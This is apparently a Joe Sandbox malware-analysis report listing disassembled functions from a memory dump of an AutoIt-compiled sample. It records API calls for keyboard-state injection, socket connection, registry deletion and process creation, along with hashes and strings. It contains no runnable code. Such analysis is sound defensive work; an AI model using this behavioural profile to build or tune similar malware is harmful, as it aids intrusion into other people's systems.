Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
String ID: @
API String ID: 3522835683-2766056989
Opcode ID: 98a06052e6037ea6fb2970c60483761811ec359651e683da2548889ff509ee4d
Instruction ID: 5c1dd39b7f321ddcc7bcc10d078eb251a602d9f768a890d439a18523313ae713
Opcode Fuzzy Hash: 98a06052e6037ea6fb2970c60483761811ec359651e683da2548889ff509ee4d
Instruction Fuzzy Hash: 3B61B1B1A006189FCB04EF55C48099EB7F5FF48314F14846EE819BB392CB38AD45CB88

Function 00460F4D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00460F8C
GetKeyboardState.USER32(?), ref: 00460FA1
SetKeyboardState.USER32(?), ref: 00461002
PostMessageW.USER32(?,00000101,00000010,?), ref: 00461030
PostMessageW.USER32(?,00000101,00000011,?), ref: 0046104F
PostMessageW.USER32(?,00000101,00000012,?), ref: 00461095
PostMessageW.USER32(?,00000101,0000005B,?), ref: 004610B8

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: f9d591f81d686d4ab57c3a6e12a7387580c65fa7c1b8952d65f3ab419e893261
Instruction ID: d8e1dc28bdc088eb6cbc7413f3b60f262c6bc769533ec748a7a92d83500406ea
Opcode Fuzzy Hash: f9d591f81d686d4ab57c3a6e12a7387580c65fa7c1b8952d65f3ab419e893261
Instruction Fuzzy Hash: 5F51D1A05046D53DFB3642348C15BBBBEA95B06304F0C898EE1D4959E3E2DDDCC8D75A

Function 00460D66 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 00460DA5
GetKeyboardState.USER32(?), ref: 00460DBA
SetKeyboardState.USER32(?), ref: 00460E1B
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00460E47
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00460E64
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00460EA8
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00460EC9

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: f49cedba9ac32d54de8a0d60295adc9efc4f295a5ca7e66696c334580efe5f7b
Instruction ID: 69172e86244207f9b898dfa665998bef84c2b13c00b7e8d8db4e4b2c62b94f0a
Opcode Fuzzy Hash: f49cedba9ac32d54de8a0d60295adc9efc4f295a5ca7e66696c334580efe5f7b
Instruction Fuzzy Hash: 035136A05447D53DFB368334CC41B7B7FA95B06300F08898EE1D4569C2E39AAC88D35A

Function 004655FD Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 0046560A
_wcsncpy.LIBCMT ref: 0046563F
_wcsncpy.LIBCMT ref: 00465671
_wcsncpy.LIBCMT ref: 004656A4
_wcsncpy.LIBCMT ref: 004656E6
_wcsncpy.LIBCMT ref: 00465720
_wcsncpy.LIBCMT ref: 0046574F

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: _wcsncpy$LocalTime
String ID:
API String ID: 2945705084-0
Opcode ID: 07e0947fe95a8180eaf0aa6e348e8d9897622cda980e67335bb2af8a3bf9752e
Instruction ID: 7a6b7d837badcf90248cfae842bd011e2e93fbf2a36f5ea1b26b70f3dca78a8a
Opcode Fuzzy Hash: 07e0947fe95a8180eaf0aa6e348e8d9897622cda980e67335bb2af8a3bf9752e
Instruction Fuzzy Hash: 5541B565D1022476CB11EBB59846ACFB7B8AF05311F90485BF508E3221FA78E285C7AE

Function 0045D56C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 121comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0045D5D4
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0045D60A
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0045D61B
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0045D69D

Strings

,,I, xrefs: 0045D578
DllGetClassObject, xrefs: 0045D610

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: ,,I$DllGetClassObject
API String ID: 753597075-1683996018
Opcode ID: 33bd84876332b2fdda090ed26e6294b9c181052f8b99c0919512b630bc0f7b16
Instruction ID: 3f0141d9bf832a65cf1f2fff52dd88c9064c6a7eaa25d9247cf5eee920db5d90
Opcode Fuzzy Hash: 33bd84876332b2fdda090ed26e6294b9c181052f8b99c0919512b630bc0f7b16
Instruction Fuzzy Hash: 1B41A4B1900204EFDF24DF14C884A9A7BA9EF44315F1581AEEC09DF206D7B4DD49CBA8

Function 00463671 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0046466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00463697,?), ref: 0046468B

Part of subcall function 0046466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00463697,?), ref: 004646A4

lstrcmpiW.KERNEL32(?,?), ref: 004636B7
_wcscmp.LIBCMT ref: 004636D3
MoveFileW.KERNEL32(?,?), ref: 004636EB
_wcscat.LIBCMT ref: 00463733
SHFileOperationW.SHELL32(?), ref: 0046379F

Strings

\*.*, xrefs: 0046372D

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
String ID: \*.*
API String ID: 1377345388-1173974218
Opcode ID: 0993e5ca929c2efa997c1b424dbcfd90290d04f9ce8d0f9705211f6a3ce64837
Instruction ID: 4e874dc4fae4897927e7b4621483e23afab501f30efb2571b7469179fc3cc0d5
Opcode Fuzzy Hash: 0993e5ca929c2efa997c1b424dbcfd90290d04f9ce8d0f9705211f6a3ce64837
Instruction Fuzzy Hash: 1A418FB1508344AEC752EF65D4419DFB7E8AF88345F40082FB48AC3261FA38D689C75B

Function 00487291 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004872AA
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00487351
IsMenu.USER32(?), ref: 00487369
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004873B1
DrawMenuBar.USER32 ref: 004873C4

Strings

0, xrefs: 0048729E

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert_memset
String ID: 0
API String ID: 3866635326-4108050209
Opcode ID: 0ee1f44b2a5140251d286675eb963f933f852416e711f3c94e98620d4ff88054
Instruction ID: fcd3fc1e0e94e91f8146e9bbeff2772ee04bbaba0065c2a20de26dc7b403efd4
Opcode Fuzzy Hash: 0ee1f44b2a5140251d286675eb963f933f852416e711f3c94e98620d4ff88054
Instruction Fuzzy Hash: AA411675A04208AFDB20EF50D894A9EBBB4FB04350F24882AFD15A7360D734ED64EB65

Function 00480FA5 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00480FD4
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00480FFE
FreeLibrary.KERNEL32(00000000), ref: 004810B5

Part of subcall function 00480FA5: RegCloseKey.ADVAPI32(?), ref: 0048101B
Part of subcall function 00480FA5: FreeLibrary.KERNEL32(?), ref: 0048106D
Part of subcall function 00480FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00481090

RegDeleteKeyW.ADVAPI32(?,?), ref: 00481058

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: b5131dabd4a2a67cadfd2e986b415e323ff756628087c751aedefec5cbf298fe
Instruction ID: 3e22e70b6f2616eb7250a30d7d8a48524582d6e50c9a57dc89dcd50e66651605
Opcode Fuzzy Hash: b5131dabd4a2a67cadfd2e986b415e323ff756628087c751aedefec5cbf298fe
Instruction Fuzzy Hash: E2311D71900109BFDB15AF90DC89EFFB7BCEF09300F10096BE501E2251D6745E8A9BA9

Function 004862CD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 004862EC
GetWindowLongW.USER32(00C32910,000000F0), ref: 0048631F
GetWindowLongW.USER32(00C32910,000000F0), ref: 00486354
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00486386
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 004863B0
GetWindowLongW.USER32(00000000,000000F0), ref: 004863C1
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 004863DB

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: b6c63574b2784a6fe8e125d212b22f8229395cc3faf42e06ca4ca63f68dab27c
Instruction ID: de0077e50bd3e6fac1d65856e76e1ec94ed34838b8122e9b1a950ed70c11c10c
Opcode Fuzzy Hash: b6c63574b2784a6fe8e125d212b22f8229395cc3faf42e06ca4ca63f68dab27c
Instruction Fuzzy Hash: 2B3125306001509FDB61EF18EC84F6E37E1FB4A714F1A05B9F9009F2B1CB75A8849B59

Function 00476173 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00477D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00477DB6

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 004761C6
WSAGetLastError.WSOCK32(00000000), ref: 004761D5
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0047620E
connect.WSOCK32(00000000,?,00000010), ref: 00476217
WSAGetLastError.WSOCK32 ref: 00476221
closesocket.WSOCK32(00000000), ref: 0047624A
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00476263

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
String ID:
API String ID: 910771015-0
Opcode ID: 2c772d8cd10b281ebb58c123377a2f6f77deb8af44f3e8561ff8297571aede33
Instruction ID: 9a8db824e4f103e753759010288aef610dd859574b1bdde890bb221953e34ba6
Opcode Fuzzy Hash: 2c772d8cd10b281ebb58c123377a2f6f77deb8af44f3e8561ff8297571aede33
Instruction Fuzzy Hash: E131C671600104ABDF10BF64CC85BBE77ADEB45714F05846EFD09A7292DB78AC088B65

Function 0045F65E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 0045F671
__wcsnicmp.LIBCMT ref: 0045F692
__wcsnicmp.LIBCMT ref: 0045F6AC

Strings

#notrayicon, xrefs: 0045F669
#requireadmin, xrefs: 0045F68C
#OnAutoItStartRegister, xrefs: 0045F6A6

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 1038674560-2734436370
Opcode ID: 659df752051c6ea00e2ad20bc59bb8864dd8c715ed7b4aab4cd92ca4da0ea462
Instruction ID: 032906fc094d91378a6d64986483b761754d261e1b02b5d61cc05f8db2f6dc85
Opcode Fuzzy Hash: 659df752051c6ea00e2ad20bc59bb8864dd8c715ed7b4aab4cd92ca4da0ea462
Instruction Fuzzy Hash: E621487220412166D620AA35AC02FA773D8AF59305B90443BFC4286192EB9C9D4EC29F

Function 004875CD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00401D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00401D73
Part of subcall function 00401D35: GetStockObject.GDI32(00000011), ref: 00401D87
Part of subcall function 00401D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00401D91

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00487632
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0048763F
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0048764A
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00487659
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00487665

Strings

Msctls_Progress32, xrefs: 00487603

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 89b1357e1ee64075d60cbe96e93ddb663670d2e9d7f59c86534f55b80d263953
Instruction ID: 4837c572468b061b20148283283cd62aa6e96b5405c17b40ad05b898919227a4
Opcode Fuzzy Hash: 89b1357e1ee64075d60cbe96e93ddb663670d2e9d7f59c86534f55b80d263953
Instruction Fuzzy Hash: B711D3B1110119BFEF109F64CC85EEB7F5DEF083A8F114115BA04A21A0D776AC21DBA8

Function 0048B635 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0048B644
_memset.LIBCMT ref: 0048B653
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,004C6F20,004C6F64), ref: 0048B682
CloseHandle.KERNEL32 ref: 0048B694

Strings

doL, xrefs: 0048B64D
oL, xrefs: 0048B63E

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID: oL$doL
API String ID: 3277943733-3421622115
Opcode ID: f6592324f54b6d11ff0072cf87150bc2a8f8a0fa5e3a8a7e269d397b8f6a706e
Instruction ID: 7a1fecbce043cfc874fe0d77b44da30ff063324afa3e4e90fef9887594455fd0
Opcode Fuzzy Hash: f6592324f54b6d11ff0072cf87150bc2a8f8a0fa5e3a8a7e269d397b8f6a706e
Instruction Fuzzy Hash: 20F05EB26403107AE2502761BC06FBB3A9CEB08395F41843ABE08E5192D7799C00C7AC

Function 0042406B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00423F85), ref: 00424085
GetProcAddress.KERNEL32(00000000), ref: 0042408C
EncodePointer.KERNEL32(00000000), ref: 00424097
DecodePointer.KERNEL32(00423F85), ref: 004240B2

Strings

RoUninitialize, xrefs: 00424074
combase.dll, xrefs: 00424080

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 3489934621-2819208100
Opcode ID: a073a7a123edb79e47074a0cfae65335df484428d24780242fe31235a0946bf9
Instruction ID: 3c20c996fd7074992a56bc66f3091c9a5c2557e351e9bc0918c4c0f6e68dcf68
Opcode Fuzzy Hash: a073a7a123edb79e47074a0cfae65335df484428d24780242fe31235a0946bf9
Instruction Fuzzy Hash: DBE09270681200AFEA90AF62ED0DB8A3AA5B704743F14893AF501E11A0CFBA46489B1C

Function 004664B8 Relevance: 9.2, APIs: 6, Instructions: 205COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0046660B
_memmove.LIBCMT ref: 00466546

Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC

_memmove.LIBCMT ref: 004665B9
_memmove.LIBCMT ref: 004666A0
_memmove.LIBCMT ref: 004666B9
_memmove.LIBCMT ref: 004666D5

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: _memmove$__itow__swprintf
String ID:
API String ID: 3253778849-0
Opcode ID: 3fb0b71cd3b5fa1b33507c2e851feef5e9dc8e8adfdfdbcab98cff070aef8684
Instruction ID: 21da70feb02ff46742cf7b1a596b1e1f747712b30ca55ffc0ed3d6fa2aea8e56
Opcode Fuzzy Hash: 3fb0b71cd3b5fa1b33507c2e851feef5e9dc8e8adfdfdbcab98cff070aef8684
Instruction Fuzzy Hash: 6261707160025A9BCF01EF61DC81AFE37A5AF05308F45452EF8556B293EB38AD05CB5A

Function 004801E4 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22

Part of subcall function 00480E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0047FDAD,?,?), ref: 00480E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004802BD
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004802FD
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00480320
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00480349
